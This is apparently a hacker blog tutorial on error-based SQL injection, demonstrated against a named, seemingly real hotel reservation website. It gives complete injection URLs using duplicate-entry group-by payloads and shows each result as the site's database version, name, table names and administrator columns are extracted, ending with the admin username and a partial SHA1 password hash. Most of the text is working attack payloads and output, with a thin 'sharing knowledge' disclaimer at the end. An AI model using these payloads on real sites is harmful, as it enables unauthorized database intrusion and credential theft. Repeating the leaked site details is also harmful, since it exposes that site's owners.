ERROR BASED SQL Injection Tutorial (For Noob To LEET) :
Quick Introduction :
A method of extracting information from a database when UNION
SELECT function does not work at all. This can be done using a compiled
query to extract the database information.Error Based Injection is Used When Two Queries Are getting executed on same parameter. or when injection is after Order By Clause.Grabbing Version ::
http://samuivillaexclusive.com/reservations.php?id=1411 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1Result : Duplicate entry '5.1.56-log:1' for key 'group_key'
Version is : 5.1.56-log
Grabbing Database ::
http://samuivillaexclusive.com/reservations.php?id=1411 or 1 group by concat_ws(0x3a,database(),floor(rand(0)*2)) having min(0) or 1
Result : Duplicate entry 'samuiexclusive:1' for key 'group_key'
Database is : samuiexclusive
Grabbing Tables ::
In Xpath Or Error Based or Duplicate Entry there's page limit when injecting a site .. i think only 31 Characters at a time .. so we can't grab all tables together with group concatenation or DIOS .. So, we use 'limit' for grabbing one table at a time ..
http://samuivillaexclusive.com/reservations.php?id=1411 and (select 1 FROM (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) FROM information_schema.tables where table_schema=database() LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables group by x)a)
Result : Duplicate entry 'administrators~1' for key 'group_key'
First Table is : administrators
For Getting Other Tables Increase the Limit ..
By limit 0,1
to limit 1,1 -- 2,1 -- 3,1 -- 4,1 -- 5,1
Limit 1,1
Result : Duplicate entry 'agent_auth~1' for key 'group_key'
Limit 2,1
Result : Duplicate entry 'blog_post_tags~1' for key 'group_key'
Limit 3,1
Result : Duplicate entry 'blog_posts~1' for key 'group_key'
Keep Increasing The Limit To Get Rest of the tables...
Grabbing Columns :: (Table : administrators)
We Use CHAR or HEX Value of Table name 'same as union based' ;)and we will use limit function here too ..
http://samuivillaexclusive.com/reservations.php?id=1411 and (select 1 FROM (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) FROM information_schema.columns where table_name=0x61646d696e6973747261746f7273 LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables group by x)a)
Result : Duplicate entry 'id~1' for key 'group_key'
First Column is : id
Increase The Limit For Getting All Columns
Limit 0,1 -- 1,1 -- 2,1 -- 3,1 -- 4,1
Limit 1,1
Result : Duplicate entry 'type~1' for key 'group_key'
Limit 2,1
Result : Duplicate entry 'username~1' for key 'group_key'
Limit 3,1
Result : Duplicate entry 'sha1_password~1' for key 'group_key'
Dumping Data Out Of Table ( Table : Administrators , Columns : username,sha1_password)
Dumping Column : Username
From Table : administrators
http://samuivillaexclusive.com/reservations.php?id=1411 and (select 1 FROM (select count(*),concat((select(select concat(cast(username as char),0x7e)) FROM administrators LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables group by x)a)
Result : Duplicate entry 'admin~1' for key 'group_key'
Username is : admin
Dumping Column : sha1_password
From Table : administrators
http://samuivillaexclusive.com/reservations.php?id=1411 and (select 1 FROM (select count(*),concat((select(select concat(cast(sha1_password as char),0x7e)) FROM administrators LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables group by x)a)
Result : Duplicate entry '1040deebf3e29be080e6a36b4d5638c1453e58b9~1' for key 'group_key'
This is Encrypted Password and its not complete .. Sha1 limit is 40 and page limit is 31
we will use substr() function for getting other characters of it .. we will talk about it later ;)
Thankx For Reading ..
Note : This Is Purely For Sharing Knowledge . We Are Not Responsible For Actions Performed By You.
hAxOr -tr0jAn*
0 comments:
Post a Comment